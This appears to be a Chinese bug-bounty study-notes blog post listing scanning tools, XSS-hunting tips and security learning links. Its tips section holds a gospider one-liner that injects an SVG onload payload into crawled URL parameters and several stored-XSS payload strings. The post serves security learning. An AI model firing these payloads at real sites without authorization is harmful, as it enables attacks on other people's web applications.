Day008

一、漏洞挖掘工具

1.JSFScan.sh JS安全扫描攻击

https://github.com/KathanP19/JSFScan.sh

2.资产发现和管理工具,研究一下这个收费网站

https://bounty.offensiveai.com/about

3. 实时HTTP入侵检测

https://github.com/kitabisa/teler

二、挖掘技巧

1.寻找XSS

gospider -a -s https://site.com -t 3 -c 100 | tr ” ” “\n” | grep -v “.js” | grep “https://&#8221; | grep “=” | qsreplace ‘%22><svg%20onload=confirm(1);>’

2.寻找存储XSS

  • 1. <img src=`xx:xx`onerror=alert(1)>
  • 2. <div/onmouseover=’alert(1)’> style=”x:”>
  • 3. \”;alert(‘XSS’);//
  • 4. “autofocus/onfocus=alert(1)//
  • 5. ‘-alert(1)-‘

3.XSS挑战

https://renwax23.github.io/X/chal/oct22/

三、学习资料

1.办公软件安全 包括PDF,office

Leaky images and other foibles of office documents

2.Recon Like A Boss

https://bugbountytuts.files.wordpress.com/2019/01/dirty-recon-1.pdf&ved=2ahUKEwiU5sSz773sAhXrRhUIHdSlBFsQFjAAegQIARAB&usg=AOvVaw30F_gNZAxD1WEjcaYd1lvX

3.聊天APP中的链接安全

https://thehackernews.com/2020/10/mobile-messaging-apps.html

4.macOS安全入门

https://theevilbit.github.io/posts/getting_started_in_macos_security/

5..Flare-On 7 Challenge Solutions

https://www.fireeye.com/blog/threat-research/2020/10/flare-on-7-challenge-solutions.html

Day008”的一个响应

sglyyqzb进行回复 取消回复

Fill in your details below or click an icon to log in:

WordPress.com 徽标

您正在使用您的 WordPress.com 账号评论。 注销 /  更改 )

Google photo

您正在使用您的 Google 账号评论。 注销 /  更改 )

Twitter picture

您正在使用您的 Twitter 账号评论。 注销 /  更改 )

Facebook photo

您正在使用您的 Facebook 账号评论。 注销 /  更改 )

Connecting to %s